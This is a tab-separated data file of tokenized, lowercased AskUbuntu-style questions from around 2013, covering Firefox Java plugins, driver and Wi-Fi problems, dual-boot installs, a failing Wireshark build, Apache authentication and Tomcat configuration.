346608	how to make firefox use the newest java version , which is already installed ?	apparently , i have openjdk 6 jre ( openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.2 ) and 7 jre ( openjdk-7-jre 7u25-2.3.10-1ubuntu0.12.04.2 ) installed in parallel â i do n't know why i have both of them , i ca n't remember installing any of them manually . however , the firefox java plugin is occasionally reported to be out of date by some websites , and it seems to me that it relies on jre 6 . how can i make firefox use the newer version ? removing jre 6 seems like a bad idea ; when i attempted to do so in synaptic it appeared to me that a lot of software still relies on the older jre , since removing it would have removed programs like jedit as well . do i mix up stuff ? i 'm not even sure how the ff plugin interferes with the openjdk jre 's . edit : having tried even more , the problem persists . using update-alternatives -- config java , i see that the default java version ( with status `` manual mode '' ) is already set to java 7 , and java -version returns `` 1.7.0_25 '' . the file /usr/lib/jvm/java-7-openjdk-i386/jre/lib/i386/icedteaplugin.so exists , but still firefox shows the java 6 plugin when looking at about : plugins . to sum it up : how do i make firefox use the icedtea plugin belonging to the default java version ?
346609	i ca n't watch movies online with my firefox	i am using ubuntu 13.04 and i can not watch movies online with my firefox . i have tried installing flash player for windows , but it wo n't start installing .
346611	gnome menu bars back to windows	i am using gnome : gnome-shell -- version gnome shell 3.4.1 the menu bars of all windows are shown at the top ( and separated from each individual window ) . since i am running my linux in a virtual machine this becomes highly annoying since the menubar overlaps with the menu of the virtual machine . how can i get my menubars back to windows ? also , how can i get the scrollbars back ( the scrollbar appears only , when one moves the mouse to the edge of the window from the left side , as moving from the right side of the window allows to change the size of the window ) ? i tried ubuntu-11-04-and-disappearing-scrollbars solution . this restores the scrollbars , but then the windows loose all other decorations and one may not move them anymore . i am sorry for these basic questions but googling gives so many irrelevant answers..
346613	how do i strip ubuntu of its amazon referral code ?	i finished a fresh install of ubuntu `` raring '' today and noticed the amazon web app comes bundled with an amazon affiliate referral code . i do n't wish for this to be there , especially given that it appears to be a violation of the associates program participation requirements . can i reconfigure the amazon web app to not include this code ? what other referral codes should i expect to stumble upon ? is there a list ? and can i remove those too ? edit : i 'm come to realize two things : '' amazon '' is not a web app but rather a web shortcut , that i can delete . apparently the canonical/ubuntu and referral code situation is n't new and received some bad press in the day . i certainly do not wish to re-open any can of worms and am more than happy with this question 's closure/deletion .
346614	apache basic authentication not working on ubuntu server	i have a basic . i am trying to implement basic authentication on this using apache . i have added below config in httpd.conf and then restarted apache but still no authentication is there when i access using browser . < location `` http : //x.x.x.x/repository/ '' > authuserfile /etc/htpasswd/.htpasswd authname `` my realm '' authgroupfile /dev/null authtype basic require valid-user < /location > < virtualhost *:80 > serveradmin your @ email.address.com documentroot `` /srv/www/httpd/htdocs '' servername yourdomain.com proxypreservehost on proxypass /repository/ ajp : //localhost:8009/repository/ < /virtualhost >
346616	boot-repair wo n't install `` unable to locate package ''	my computer wo n't boot so i am trying to install boot-recovery using the instructions from https : //help.ubuntu.com/community/boot-repair . the initial command runs fine : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update but when i excecute the next command : sudo apt-get install -y boot-repair & & ( boot-repair & ) i brings up the following error ubuntu @ ubuntu : ~ $ sudo apt-get install -y boot-repair & & ( boot-repair & ) reading package lists ... done building dependency tree reading state information ... done e : unable to locate package boot-repair i am running a live usb on ubuntu 11.10 if that makes any difference . thanks for the help developernewb
346619	how to start the text mode installer from the kubuntu 12.04 dvd ?	i 'm trying to install kubuntu 12.04 from the dvd , and i want the text-mode installer . i do n't see how i can get to it from the boot menu . what should i enter as the boot options ? or should i start the installer from the command-line after boot ? notes : - in the f4 modes menu , i only see the 'normal mode ' . - i know i can achieve this with the alternate boot cd . but i want this on the dvd , with all the packages the dvd has ( e.g . for installations with no internet access ) .
346622	xmodmaps - setup does n't work in browser	i 've remapped my spacebar to alt and viceversa since my spacebar is failing me lately . anyway everything seems to work just fine , i saved my setup using xmodmaps , then i load it on startup . well the excanged key setup works.. only in terminal . when i run browser like chrome , some kind of text editor or anything else - it does not work . why does this happen ? i run simple .sh script loading my xmodmaps config on startup , perhaps thath 's the problem ? if it 's then how should i run it ?
346626	proper way to create a launcher for an lxc or ssh remote app ?	i created a unity launcher for an eclipse-based ide . this worked nicely ; i could launch the ide and/or switch to it with meta-5 and all was good . then i wanted to upgrade to 13.04 , but the builds must continue in a 12.04 environment , so i upgraded the primary os , and created a linux container ( lxc ) for 12.04 , and installed the ide inside that . this works nicely also ; i can run the ide , and develop , as before , with no problems . but the launcher does n't work so well . : - ( i modified my old lanucher so that it now runs the command like this : ssh -x 10.0.3.154 /path/to/ide this does work , the ide does run , and i can work as before , but it creates a new launcher icon in unity , at the bottom of the list . this means i can still start the ide with meta-5 , but i have to switch to it with meta- < some other number > which is n't nearly so convenient . is there another way to this without the ssh command ? lxc-start with a specific command is no good because i want to be able to run more than one app from the 12.04 container simultaneously . lxc-execute does n't seem to do what it sounds like . is there a way to get arbitrary remote apps to work nicely with unity launchers ? the problem seems to be more to do with ssh -x than lxc , after all . this is a minor issue , but it 's been annoying me , so a fix would be nice . update : to make it clear : right now i get two launchers for the ide , whenever it 's running : the locked one , and a temporary one . only the first can be used for launch ( even if i lock the second ) , and only the second can be used for switching .
346627	i ca n't change resolution in xubuntu 13.04	i used to have ubuntu on my pc , but then i decided to try xubuntu 13.04 . i installed it but the better resolution available is 1024x768 . i want to set a 1440x900 resolution , which is supported by my display and which i could set in ubuntu 13.04 by using xrandr , creating a xorg.conf file , making thus the new settings permanent . when i use xrandr in xubuntu 13.04 to create a new `` mode '' ( using the same method i applied for ubuntu ) , everything is fine , the new mode is created . but when i try to apply it from the system settings menu , it apparently applies it ( it also appears the pop-up window asking if i want to keep the setting ) but the resolution is acstually still 1024x768 ! i need some help , this issue is getting on my nerves .
346633	how do i use tomcat 7 in eclipse ?	i have installed eclipse and tomcat 7 but when i select project explorer - > new server it does n't show me tomcat 7 to add as a server . i have also looked at windows - > preferences - > server - > runtime environment - > add , but it does n't shown tomcat either .
346634	ibm 's external disc drive did n't recognise in ubuntu gnome 13.04	i bought an external dvd drive from ibm 's , i plugged into windows 8 and it ran well . but when i plug it into my ubuntu , it did n't recognise ( at all ) . i opened gnome mplayer but it did n't play ( even with no message , it just says `` paused '' ) . of course the drive 'acted ' like it 's reading , but it 's not . i opened nautilus but it shown nothing . i usually use handbrake to rip discs , and it says that the 2nd disc drive is 'sr1 ' .
346637	hp pavilion dv5 wo n't sleep on ubuntu 12.04 lts	when i command the computer to sleep , the screen turns black for a few seconds , then a few communicates blinks and `` unlock '' screen appears , asking for password as if i simply locked the computer . it does not hang or anything , but it does not sleep either . i read that bios update is supposed to fix the problem . thing is that i also have a windows on my machine ( to be specific : hp pavilion dv5 entertainment 1080-eh ) , but hp provides bios updates only for windows vista or windows 7 users , and i use windows 8 . my question is , do i really need to get 7 or vista and install it alongside to update bios ( and does it really fix the problem ) , or can i install bios update version for windows 7 on my 8 ? or maybe there is another solution to the problem ?
346638	ubuntu gnome 3.0 ctrl+alt+shift+r screencast recorder not working	i 'm trying to record a video , but nothing is happening when i 'm pressing ctrl+alt+shift+r , while the wiki claims that i 'm supposed at least to see a red circle at the bottom . are there some prerequisites ? i 've just installed the gnome and have n't tweaked any settings . here 's some system info : lsb_release -a release : 12.10 and , $ gnome-shell -- version gnome shell 3.6.3.1
346639	synclient alias in .bashrc not responding	i created an alias to turn the mousepad off with synclient , but it does not respond as expected . after running the synclient touchpadoff=1 in the terminal however , the alias starts to work properly . the alias to start and stop xampp work fine every time . from ~/.bashrc : # custom aliases alias lamp= '' sudo /opt/lampp/xampp start '' alias stoplamp= '' sudo /opt/lampp/xampp stop '' alias touchoff= '' synclient touchpadoff=1 '' alias touchon= '' synclient touchpadoff=0 '' can anyone see why this is ? update : i moved the aliases to .bash_aliases and placed touchoff and touchon first . this seems to alter the results abit . now it works when i run the command touchoff twice . and when i run touchon again ( once ) , the touchpad works for a few seconds . when i run it again , it sticks . i have also tested this on fedora 18 where the .bashrc file is almost empty , and it works as expected . no issues there . if someone else could try this in ubuntu 13.04 and leave a comment below , that might be helpful . it requires a reboot , though . sorry for asking ... -_-
346645	how do i check if mir is in-use ?	https : //wiki.ubuntu.com/mir/gputesting mentions the use of : ps ax | grep `` unity '' but that alone does n't mention `` unity-system-compositor '' using ps ax | grep `` unity-system-compositor '' does mention unity-system-compositor however . i 'm wondering if there is any other way to check for mir ? i 'm using today 's saucy build ( 9/17 ) .
346647	wi-fi problems on ubuntu 13.04 in my hp pavilion g6 2320 tx model	i have hp pavilion g6 2320 tx model with preinstalled windows 8 . i have this wi-fi problem on my laptop on which i have ubuntu 13.04 installed along with windows 8 as my default os . ubuntu shows available wi-fi connections , but when i select a connection , the connection lasts only for a minute or less . but on windows8 the same wi-fi connection works perfectly fine . because of this wi-fi problem i ca n't even update the ubuntu . alse while installing updates via ethernet ( connection via ethernet is also an issue similar to the wi-fi problem ) it shows an error of some 'lock file ' which stop the installation of the updates . please help me solving these issues ... thanks ! ! !
346648	when will ubuntu include digital certificates from govt of india root ca pki cca india 2007 ?	ubuntu for all platforms ( laptops+mobiles ) must respect and contain government of india 's root ca and ca certificates and improve compliance with indian it act 2000 ( cross certification ) and law enforcement rules by including these by default : root certificate 2011 root certificate 2007 other cas ( 2011 and 2007 ) : any reasons for missing these out on ubuntu , a globally renowned and acknowledged operating system from national security , security architecture ... perspectives ? manually adding these certificates does not make sense for global product like ubuntu operating system any eta on any update/upgrade/new release to fix this issue ?
346649	how do i force wget to use a proxy server without modifying system files ?	i 'd like to know an equivalent to wget enabling me to set the proxy while calling the command ( like wget -- proxy= $ http_proxy ) . any ideas ?
346650	how to share a internet connection using wireless to a galaxy note/2 ?	currently i am using tata photon+ usb modem as my internet source . i need to share the network from my laptop to my samsung galaxy note 2 and samsung galaxy note . i tried searching many posts but it seems they all work for wired internet connection . please i am new to ubuntu so please provide me the steps in details how to get this working .
346653	ubuntu 12.10 randomly started to freeze on boot	thanks for the great support community . love being able to get answers quick . okay , so here 's my problem . just yesterday , ubuntu 12.10 started to randomly freeze during boot right at the point where i got to see my mouse on the screen . i had to manually power off my laptop . : ( today , however , it would not boot correctly if i manually power it off . it just stays stuck on the boot right where i get my mouse . i have had no problems with my kernel . if i boot into an old kernel , it works fine . should i reinstall this kernel ? is there a problem with grub ? my kernel that is not booting is 3.5.0-39 . the one that i can get to work is 3.5.0-37 . thanks for the help . -raleigh
346656	viber headless ?	is it possible to use viber on a headless ubuntu system ? i want to use it through an ssh connection remotely , i need to get and send messages by it . but on ssh , there is no easy way to use gui based program . so is it possible ? if yes , how ? what hacks can be applicable ?
346657	installing windows 8 alongside ubuntu 13.04	i had windows 8 installed on my laptop ( 64-bit ) and when i installed ubuntu on it i made a huge mistake and removed windows 8 and every file with it . what done is done.. i 've been running ubuntu 13.04 for a month now and i would like to install windows 8 again alongside ubuntu . i want it to be a dual boot , so when i start my laptop i can choose between the two . installing windows 8 will be legit from a website from my university , i can just download it for free . how to do this ? ? ( - do i need to use a harddrive/cd to put windows on ? ) thx in advance !
346664	gui not active in ubuntu 12.10	i have installed ubuntu 12.10 on my hp d530 desktop but i 'm getting a plain gui with no icons or menu bar . i 'm stuck . how do i activate it to be usable ? i 'm very new to ubuntu .
346665	usb modem taking a long time to be identified	i earlier had a problem with my usb modem , described here : - unable to see the ui while using usb modem . i however had the problem fixed . i recently installed updates recommended to me by the system , and ever since then , it takes a lot of time ( at least 5 minutes ) for the network manager to identify and show the modem . why might this be happening and what are the possible solutions ? thanks in advance .
346672	installing 12.04.2 on one hard drive with windows 7 on another	i have a workstation with windows 7 professional . following is system summary : os name microsoft windows 7 professional version 6.1.7601 service pack 1 build 7601 other os description not available os manufacturer microsoft corporation system name radiolab-hp system manufacturer hewlett-packard system model hp z420 workstation system type x64-based pc processor intel ( r ) xeon ( r ) cpu e5-1620 0 @ 3.60ghz , 3601 mhz , 4 core ( s ) , 8 logical processor ( s ) bios version/date hewlett-packard j61 v03.15 , 5/9/2013 smbios version 2.7 windows directory c : \windows system directory c : \windows\system32 boot device \device\harddiskvolume1 locale united states hardware abstraction layer version = `` 6.1.7601.17514 '' user name radiolab-hp\radiolab time zone india standard time installed physical memory ( ram ) 32.0 gb total physical memory 31.9 gb available physical memory 28.6 gb total virtual memory 63.8 gb available virtual memory 59.8 gb page file space 31.9 gb page file c : \pagefile.sys the workstation contains two hard disks of ~2tb each . i wish to dual boot this machine with ubuntu 12.04.2 on the second of the two hard drives with the first reserved for windows . i tried installing ubuntu 12.04.2 using a bootable pendrive but the installation threw the 'grub-install /dev/sdx failed ' error . the error occurred when i tried to place the bootloader in either of the disks [ sda , sda1 ( windows loader ) , sdb ] . so i rebooted my machine using the live pendrive , mounted the hard disk containing windows [ sda ] and installed grub on it using the 'grub-install ... ' command . this , in turn , caused problems with my windows bootloader and just started showing the minimalist grub bash on startup . i used the windows recovery disk to fix the windows mbr . so , my questions now are : a ) how do i go about installing ubuntu on my workstation ? should i try installing an ubuntu version higher than 12.04.2 ? b ) where should i place grub ? please let me know if any further information about my machine is required . thanks for your help .
346678	how do i resume a release upgrade/update ?	yesterday i started the upgrade from 12.10 to 13.04 , but i interrupted it because it was taking too long . now if i restart it , it does n't proceed . is there any possibility to clean the mess he left when i interrupted him and make a clean restart of this update ? thanks for any help you can provide !
346682	problem with the installation of wireshark ubuntu `` make '' failed	i need to install wireshark but it seems to have some problems when i type sudo make command . here is what i get : dell @ ubuntu : ~/wireshark $ make lang=c /usr/bin/perl ./make-version.pl . version configuration file version.conf not found . using defaults . this is not a svn build . svnversion.h is up-to-date . make all-recursive make [ 1 ] : entering directory `/home/dell/wireshark' making all in tools make [ 2 ] : entering directory `/home/dell/wireshark/tools' making all in lemon make [ 3 ] : entering directory `/home/dell/wireshark/tools/lemon' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/tools/lemon' make [ 3 ] : entering directory `/home/dell/wireshark/tools' make [ 3 ] : nothing to be done for `all-am ' . make [ 3 ] : leaving directory `/home/dell/wireshark/tools' make [ 2 ] : leaving directory `/home/dell/wireshark/tools' making all in wsutil make [ 2 ] : entering directory `/home/dell/wireshark/wsutil' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/dell/wireshark/wsutil' making all in wiretap make [ 2 ] : entering directory `/home/dell/wireshark/wiretap' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/dell/wireshark/wiretap' making all in doc make [ 2 ] : entering directory `/home/dell/wireshark/doc' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/dell/wireshark/doc' making all in epan make [ 2 ] : entering directory `/home/dell/wireshark/epan' making all in crc make [ 3 ] : entering directory `/home/dell/wireshark/epan/crc' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/epan/crc' making all in crypt make [ 3 ] : entering directory `/home/dell/wireshark/epan/crypt' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/epan/crypt' making all in ftypes make [ 3 ] : entering directory `/home/dell/wireshark/epan/ftypes' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/epan/ftypes' making all in dfilter make [ 3 ] : entering directory `/home/dell/wireshark/epan/dfilter' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/epan/dfilter' making all in dissectors make [ 3 ] : entering directory `/home/dell/wireshark/epan/dissectors' make all-am make [ 4 ] : entering directory `/home/dell/wireshark/epan/dissectors' make [ 4 ] : nothing to be done for `all-am ' . make [ 4 ] : leaving directory `/home/dell/wireshark/epan/dissectors' make [ 3 ] : leaving directory `/home/dell/wireshark/epan/dissectors' make [ 3 ] : entering directory `/home/dell/wireshark/epan' make [ 3 ] : nothing to be done for `all-am ' . make [ 3 ] : leaving directory `/home/dell/wireshark/epan' make [ 2 ] : leaving directory `/home/dell/wireshark/epan' making all in plugins make [ 2 ] : entering directory `/home/dell/wireshark/plugins' making all in asn1 make [ 3 ] : entering directory `/home/dell/wireshark/plugins/asn1' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/asn1' making all in docsis make [ 3 ] : entering directory `/home/dell/wireshark/plugins/docsis' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/docsis' making all in ethercat make [ 3 ] : entering directory `/home/dell/wireshark/plugins/ethercat' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/ethercat' making all in giop make [ 3 ] : entering directory `/home/dell/wireshark/plugins/giop' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/giop' making all in gryphon make [ 3 ] : entering directory `/home/dell/wireshark/plugins/gryphon' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/gryphon' making all in irda make [ 3 ] : entering directory `/home/dell/wireshark/plugins/irda' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/irda' making all in m2m make [ 3 ] : entering directory `/home/dell/wireshark/plugins/m2m' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/m2m' making all in mate make [ 3 ] : entering directory `/home/dell/wireshark/plugins/mate' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/mate' making all in opcua make [ 3 ] : entering directory `/home/dell/wireshark/plugins/opcua' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/opcua' making all in profinet make [ 3 ] : entering directory `/home/dell/wireshark/plugins/profinet' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/profinet' making all in sercosiii make [ 3 ] : entering directory `/home/dell/wireshark/plugins/sercosiii' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/sercosiii' making all in stats_tree make [ 3 ] : entering directory `/home/dell/wireshark/plugins/stats_tree' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/stats_tree' making all in unistim make [ 3 ] : entering directory `/home/dell/wireshark/plugins/unistim' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/unistim' making all in wimax make [ 3 ] : entering directory `/home/dell/wireshark/plugins/wimax' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/wimax' making all in mux make [ 3 ] : entering directory `/home/dell/wireshark/plugins/mux' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/mux' making all in wimaxasncp make [ 3 ] : entering directory `/home/dell/wireshark/plugins/wimaxasncp' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins/wimaxasncp' make [ 3 ] : entering directory `/home/dell/wireshark/plugins' make [ 3 ] : nothing to be done for `all-am ' . make [ 3 ] : leaving directory `/home/dell/wireshark/plugins' make [ 2 ] : leaving directory `/home/dell/wireshark/plugins' making all in packaging make [ 2 ] : entering directory `/home/dell/wireshark/packaging' making all in macosx make [ 3 ] : entering directory `/home/dell/wireshark/packaging/macosx' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/packaging/macosx' making all in rpm make [ 3 ] : entering directory `/home/dell/wireshark/packaging/rpm' making all in specs make [ 4 ] : entering directory `/home/dell/wireshark/packaging/rpm/specs' make [ 4 ] : nothing to be done for `all ' . make [ 4 ] : leaving directory `/home/dell/wireshark/packaging/rpm/specs' make [ 4 ] : entering directory `/home/dell/wireshark/packaging/rpm' make [ 4 ] : nothing to be done for `all-am ' . make [ 4 ] : leaving directory `/home/dell/wireshark/packaging/rpm' make [ 3 ] : leaving directory `/home/dell/wireshark/packaging/rpm' making all in svr4 make [ 3 ] : entering directory `/home/dell/wireshark/packaging/svr4' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/packaging/svr4' making all in nsis make [ 3 ] : entering directory `/home/dell/wireshark/packaging/nsis' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/dell/wireshark/packaging/nsis' make [ 3 ] : entering directory `/home/dell/wireshark/packaging' make [ 3 ] : nothing to be done for `all-am ' . make [ 3 ] : leaving directory `/home/dell/wireshark/packaging' make [ 2 ] : leaving directory `/home/dell/wireshark/packaging' making all in help make [ 2 ] : entering directory `/home/dell/wireshark/help' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/dell/wireshark/help' making all in codecs make [ 2 ] : entering directory `/home/dell/wireshark/codecs' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/dell/wireshark/codecs' making all in gtk make [ 2 ] : entering directory `/home/dell/wireshark/gtk' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/dell/wireshark/gtk' make [ 2 ] : entering directory `/home/dell/wireshark' lang=c /usr/bin/perl ./make-version.pl . version configuration file version.conf not found . using defaults . this is not a svn build . svnversion.h is up-to-date . /bin/bash ./libtool -- tag=cc -- mode=link gcc -dinet6 -d_u_= '' __attribute__ ( ( unused ) ) '' -g -o2 -wall -w -wdeclaration-after-statement -wendif-labels -wpointer-arith -wno-pointer-sign -warray-bounds -wcast-align -wformat-security -i/usr/local/include -pthread -i/usr/include/gtk-2.0 -i/usr/lib/x86_64-linux-gnu/gtk-2.0/include -i/usr/include/atk-1.0 -i/usr/include/cairo -i/usr/include/gdk-pixbuf-2.0 -i/usr/include/pango-1.0 -i/usr/include/gio-unix-2.0/ -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -i/usr/include/pixman-1 -i/usr/include/freetype2 -i/usr/include/libpng12 -i/usr/include -l/usr/local/lib -l/usr/local/lib -l/usr/local/lib -l/usr/local/lib -o dftest dftest-dftest.o dftest-util.o wiretap/libwiretap.la wsutil/libwsutil.la epan/libwireshark.la -dlopen plugins/asn1/asn1.la -dlopen plugins/docsis/docsis.la -dlopen plugins/ethercat/ethercat.la -dlopen plugins/giop/cosnaming.la -dlopen plugins/giop/coseventcomm.la -dlopen plugins/gryphon/gryphon.la -dlopen plugins/irda/irda.la -dlopen plugins/m2m/m2m.la -dlopen plugins/mate/mate.la -dlopen plugins/mux/mux.la -dlopen plugins/opcua/opcua.la -dlopen plugins/profinet/profinet.la -dlopen plugins/sercosiii/sercosiii.la -dlopen plugins/stats_tree/stats_tree.la -dlopen plugins/unistim/unistim.la -dlopen plugins/wimax/wimax.la -lpcre -wl , -- export-dynamic -pthread -lgmodule-2.0 -lrt -lglib-2.0 -lm -l/usr/lib/x86_64-linux-gnu -lpcap -lcares -l/usr/lib/x86_64-linux-gnu -wl , -bsymbolic-functions -wl , -z , relro -lkrb5 -lk5crypto -lcom_err -l/lib/x86_64-linux-gnu -lgcrypt -lgnutls -l/usr/lib -lsmi -lz libtool : link : rm -f .libs/dftest.nm .libs/dftest.nms .libs/dftest.nmt ./libtool : line 3687 : .libs/dftests.c : permission denied ./libtool : line 3823 : .libs/dftest.nm : permission denied make [ 2 ] : *** [ dftest ] error 1 make [ 2 ] : leaving directory `/home/dell/wireshark' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/dell/wireshark' make : *** [ all ] error 2
346683	ubuntu and racadm	i recently purchased a used poweredge 1850 server and it came with a drac card . after wiping the hdd and installing ubuntu server 12.04.3 lts amd64 on it , i am now trying to gain access to the drac which i believe is version 4 . i have properly configured the drac to use it 's own ip on my lan and when i point my browser to the ip address , i am greeted with the drac login page ( it has the dell logo and everything ) . however , after trying the credentials of root/calvin , i was denied access . so i think that the previous owners had set their own password . after doing some reading , it appears that i can reset the credentials to the default using racadm config -g cfguseradmin -o cfguseradminpassword -i 1 newpassword but upon entering the command , i get this error : bash : /usr/sbin/racadm : no such file or directory this holds true even if i run sudo su prior to running the racadm command . if , however , i run sudo racadm config -g cfguseradmin -o cfguseradminpassword -i 1 newpassword there are no errors . yet , when i try to log into the drac via the web interface using the credentials of root/newpassword i am still not granted access . i installed the dell utilities via the guide at https : //wiki.ubuntu.com/hardwaresupportmachinesserversdellnotes . i first tried to install the 64 bit version that is on the dell repositories , but after that was unsuccessful , i just followed the guide verbatim . no errors were produced in either case . i even followed the information at the bottom of the guide by executing sudo pppd /dev/ttys1 1382400 crtscts noipdefault noauth lock persist connect 'chat -v `` '' client clientserver `` \\c '' ' but obviously , replacing the /dev/ttys1 with the correct information for my system . ls -l /usr/sbin/ | grep racadm yields -rwxr-xr-x 1 root root 87930 sep 16 04:03 racadm i have tried these credentials after each attempt of changing the password : root/calvin root/newpassword admin/calvin admin/newpassword all have been unsuccessful . what is the next course of action that i should take ?
346685	wired connection problem ( ubuntu 13.04 , realtek rtl8111/8168 ethernet controller )	last week , i experienced a problem with wired connection on my ubuntu 12.04 installation . i 'm in a college dorm and i have to connect to the dorm network using 802.1x security . it worked great on both my windows 7 and ubuntu 12.04 installations ( dual boot ) until the connection started failing on ubuntu . it would start to try to connect ( network manager icon going ''up and down '' ) and after 30-40 seconds a window would jump out , asking me to enter my username and password for 802.1x . when i did , it would just keep trying to connect and after 30-40 seconds the same window would jump out . my ubuntu 12.04 install was fairly fresh and i planned on upgrading to 13.04 anyway , so i removed 12.04 installation and installed 13.04 . everything went smoothly , but networking issue remains . here is my ifconfig and lshw : ifconfig eth0 link encap : ethernet hwaddr ac:22:0b:0f : eb:9f inet6 addr : fe80 : :ae22 : bff : fe0f : eb9f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3 errors:0 dropped:0 overruns:0 frame:0 tx packets:56 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:180 ( 180.0 b ) tx bytes:11073 ( 11.0 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:105 errors:0 dropped:0 overruns:0 frame:0 tx packets:105 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:9362 ( 9.3 kb ) tx bytes:9362 ( 9.3 kb ) lshw *-network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:04:00.2 logical name : eth0 version : 0a serial : ac:22:0b:0f : eb:9f size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8411-1_0.0.3 06/18/12 latency=0 link=yes multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport : d000 ( size=256 ) memory : f2104000-f2104fff memory : f2100000-f2103fff edit : after some additional googling , i discovered that realtek 8168 is known for having problems with linux : http : //www.twm-kd.com/linux/realtek-rtl81688111e-and-ubuntu-linux/ http : //unixblogger.wordpress.com/2011/10/18/the-pain-of-an-realtek-rtl8111rtl8168-ethernet-card/ i downloaded latest driver from realtek 's website ( version 8.036.00 ) , installed it according to readme file found with it , everything ran smoothly ... but it 's still not working .
346686	upgrading from 12.04 lts to 12.10	i have ubuntu 12.04 installed on my vaio , alongside windows 7 . i know ubuntu upgrades wo n't damage my windows drive and i 'm fine about it , but i 've seen people saying 'unity 2d removal ' and 'purge drivers before install ' and something like that . i know that unity 2d is going to be removed , however , i have gnome , kde , xfce and unity all in my ubuntu 12.04 . i do n't know if there 's still a problem , or is the entire lightdm going to be removed ? ( since i did n't choose kdm during kde install so i 'm stuck with lightdm ) . and what 's all the fuss about the graphic driver removal ? can someone please explain to me ?
346689	ubuntu touch wont boot after install	ubuntu touch wont boot after install on nexus 7 . it starts and then reboots and goes back to google screen . i do n't get any errors but it just wont load . i am using multirom and android 4.3
346690	why does guacamole close connections after some time ?	i 'm using guacamole , a html5 application that serves as a gateway between a vnc server and a web browser . the problem is that when i log in , guacamole drops the connection after a limited period of time . the same does not happen with mac os or windows . what should i do ?
346697	ubuntu boot problem	hi all i have new pacard bell lv44hc intel i3-2350m video nvidia gt 710m . after boot from usb or cd i ca n't see anything but laptop still work and load linux . i try with different distributions but have the same problem .
346698	ubuntu with unremovable device on amazon	we are using a 10.04 canonical ubuntu instance image on an amazon instance store . we recently unmounted a device and detached it from the instance . the problem is that the device still shows up in /dev . since the drive was unmounted and detached we tried removing the device with sudo rm /dev/sdf1 however , this is now preventing us from attaching anything on this drive anymore . note , we had to force detach it because it was n't detaching properly . is there a way to reset the device ? i am sure rm was the wrong thing to do . i suspect restarting the instance will fix the problem but i am hesitant to do that .
346699	changing default tomcat6 user in 12.04	i 'm using ubuntu 12.04 and tomcat 6 installed via package . i 'd like to change the user which starts and runs tomcat to something different , say the 'xc ' user . i added the user and group to the system . then i changed the two lines in /etc/init.d/tomcat6 to reflect the new user : tomcat6_user=xc tomcat6_group=xc finally , for the following directories i did chown -r xc : xc : /var/lib/tomcat6/common /var/lib/tomcat6/server /var/lib/tomcat6/shared /var/lib/tomcat6/webapps and to /var/log/tomcat6 , i chowned the files to xc : adm. basically any directory i could find that was owned by tomcat6 , i changed to xc . however , when i try to start the service it fails and there 's nothing in either the tomcat logs or the system logs indicating why . does anyone know what else i need to do to get tomcat 6 to start up with a custom user ? thanks .
